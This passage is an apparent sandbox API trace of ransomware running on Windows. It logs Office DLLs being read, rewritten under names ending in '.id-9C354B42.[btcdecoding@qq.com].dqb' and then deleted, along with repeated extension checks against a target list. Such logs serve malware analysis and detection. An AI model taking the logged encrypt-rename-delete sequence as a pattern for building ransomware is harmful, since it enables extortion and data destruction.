shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0054.419] GetLastError () returned 0x0 [0054.419] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xcdb0, lpOverlapped=0x0) returned 1 [0054.431] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xcdc0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xcdc0, lpOverlapped=0x0) returned 1 [0054.433] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.433] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.433] SetEndOfFile (hFile=0x178) returned 1 [0054.433] CloseHandle (hObject=0x178) returned 1 [0054.433] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.433] SetEndOfFile (hFile=0x200) returned 1 [0054.434] CloseHandle (hObject=0x200) returned 1 [0054.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.434] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString=".doc") returned 4 [0054.435] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString=".docx") returned 5 [0054.435] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0054.435] lstrlenW (lpString=".pdf") returned 4 [0054.435] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString=".xls") returned 4 [0054.435] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString=".xlsx") returned 5 [0054.435] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0054.435] lstrlenW (lpString=".ppt") returned 4 [0054.435] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString=".zip") returned 4 [0054.435] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString=".rar") returned 4 [0054.435] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString=".bz2") returned 4 [0054.435] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.435] lstrlenW (lpString=".7z") returned 3 [0054.435] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString=".dbf") returned 4 [0054.435] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString=".1cd") returned 4 [0054.435] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.435] lstrlenW (lpString=".jpg") returned 4 [0054.435] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.436] lstrlenW (lpString=".doc") returned 4 [0054.436] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.436] lstrlenW (lpString=".docx") returned 5 [0054.436] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0054.436] lstrlenW (lpString=".pdf") returned 4 [0054.436] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.436] lstrlenW (lpString=".xls") returned 4 [0054.436] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.437] lstrlenW (lpString=".xlsx") returned 5 [0054.437] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0054.437] lstrlenW (lpString=".ppt") returned 4 [0054.437] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.437] lstrlenW (lpString=".zip") returned 4 [0054.437] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.437] lstrlenW (lpString=".rar") returned 4 [0054.437] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.437] lstrlenW (lpString=".bz2") returned 4 [0054.437] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.437] lstrlenW (lpString=".7z") returned 3 [0054.437] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.437] lstrlenW (lpString=".dbf") returned 4 [0054.437] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.437] lstrlenW (lpString=".1cd") returned 4 [0054.437] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0054.437] lstrlenW (lpString=".jpg") returned 4 [0054.437] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.437] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.437] lstrlenW (lpString="ACERECR.DLL") returned 11 [0054.437] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.438] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=20944) returned 1 [0054.438] CloseHandle (hObject=0x200) returned 1 [0054.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 0x20 [0054.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.438] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.438] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0054.439] GetLastError () returned 0x0 [0054.439] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x51d0, lpOverlapped=0x0) returned 1 [0054.508] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x51e0, lpOverlapped=0x0) returned 1 [0054.520] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.523] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.524] SetEndOfFile (hFile=0x178) returned 1 [0054.524] CloseHandle (hObject=0x178) returned 1 [0054.526] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.527] SetEndOfFile (hFile=0x200) returned 1 [0054.532] CloseHandle (hObject=0x200) returned 1 [0054.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.539] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 1 [0054.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.542] lstrlenW (lpString=".doc") returned 4 [0054.542] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.542] lstrlenW (lpString=".docx") returned 5 [0054.542] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.544] lstrlenW (lpString=".pdf") returned 4 [0054.544] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.544] lstrlenW (lpString=".xls") returned 4 [0054.544] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.544] lstrlenW (lpString=".xlsx") returned 5 [0054.544] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.544] lstrlenW (lpString=".ppt") returned 4 [0054.544] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.552] lstrlenW (lpString=".zip") returned 4 [0054.552] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.553] lstrlenW (lpString=".rar") returned 4 [0054.553] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.553] lstrlenW (lpString=".bz2") returned 4 [0054.553] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.553] lstrlenW (lpString=".7z") returned 3 [0054.553] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.554] lstrlenW (lpString=".dbf") returned 4 [0054.554] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.560] lstrlenW (lpString=".1cd") returned 4 [0054.560] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.560] lstrlenW (lpString=".jpg") returned 4 [0054.560] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.560] lstrlenW (lpString=".doc") returned 4 [0054.560] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.560] lstrlenW (lpString=".docx") returned 5 [0054.560] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.560] lstrlenW (lpString=".pdf") returned 4 [0054.560] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.560] lstrlenW (lpString=".xls") returned 4 [0054.560] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.560] lstrlenW (lpString=".xlsx") returned 5 [0054.560] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.560] lstrlenW (lpString=".ppt") returned 4 [0054.560] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.561] lstrlenW (lpString=".zip") returned 4 [0054.561] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.561] lstrlenW (lpString=".rar") returned 4 [0054.561] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.561] lstrlenW (lpString=".bz2") returned 4 [0054.561] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.561] lstrlenW (lpString=".7z") returned 3 [0054.561] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.561] lstrlenW (lpString=".dbf") returned 4 [0054.561] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.561] lstrlenW (lpString=".1cd") returned 4 [0054.561] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0054.561] lstrlenW (lpString=".jpg") returned 4 [0054.561] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.561] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.561] lstrlenW (lpString="ACEWSTR.DLL") returned 11 [0054.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.562] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=862608) returned 1 [0054.562] CloseHandle (hObject=0x200) returned 1 [0054.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 0x20 [0054.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.562] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.562] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0054.563] GetLastError () returned 0x0 [0054.563] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xd2990, lpOverlapped=0x0) returned 1 [0054.579] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xd29a0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xd29a0, lpOverlapped=0x0) returned 1 [0054.592] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.592] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.810] SetEndOfFile (hFile=0x178) returned 1 [0054.811] CloseHandle (hObject=0x178) returned 1 [0054.811] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.811] SetEndOfFile (hFile=0x200) returned 1 [0054.818] CloseHandle (hObject=0x200) returned 1 [0054.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.818] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 1 [0054.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.818] lstrlenW (lpString=".doc") returned 4 [0054.818] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.818] lstrlenW (lpString=".docx") returned 5 [0054.818] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.818] lstrlenW (lpString=".pdf") returned 4 [0054.818] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.818] lstrlenW (lpString=".xls") returned 4 [0054.818] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.818] lstrlenW (lpString=".xlsx") returned 5 [0054.818] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.819] lstrlenW (lpString=".ppt") returned 4 [0054.819] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString=".zip") returned 4 [0054.819] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString=".rar") returned 4 [0054.819] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString=".bz2") returned 4 [0054.819] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.819] lstrlenW (lpString=".7z") returned 3 [0054.819] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString=".dbf") returned 4 [0054.819] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString=".1cd") returned 4 [0054.819] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString=".jpg") returned 4 [0054.819] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.819] lstrlenW (lpString=".doc") returned 4 [0054.819] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString=".docx") returned 5 [0054.819] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0054.819] lstrlenW (lpString=".pdf") returned 4 [0054.819] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString=".xls") returned 4 [0054.819] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString=".xlsx") returned 5 [0054.819] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0054.819] lstrlenW (lpString=".ppt") returned 4 [0054.819] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.820] lstrlenW (lpString=".zip") returned 4 [0054.820] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.820] lstrlenW (lpString=".rar") returned 4 [0054.820] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.820] lstrlenW (lpString=".bz2") returned 4 [0054.820] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.820] lstrlenW (lpString=".7z") returned 3 [0054.820] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.820] lstrlenW (lpString=".dbf") returned 4 [0054.820] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.820] lstrlenW (lpString=".1cd") returned 4 [0054.820] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0054.820] lstrlenW (lpString=".jpg") returned 4 [0054.820] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.820] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.820] lstrlenW (lpString="MSSOAPR3.DLL") returned 12 [0054.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.810] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=41864) returned 1 [0055.810] CloseHandle (hObject=0x184) returned 1 [0055.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 0x20 [0055.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.810] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.810] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.811] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, 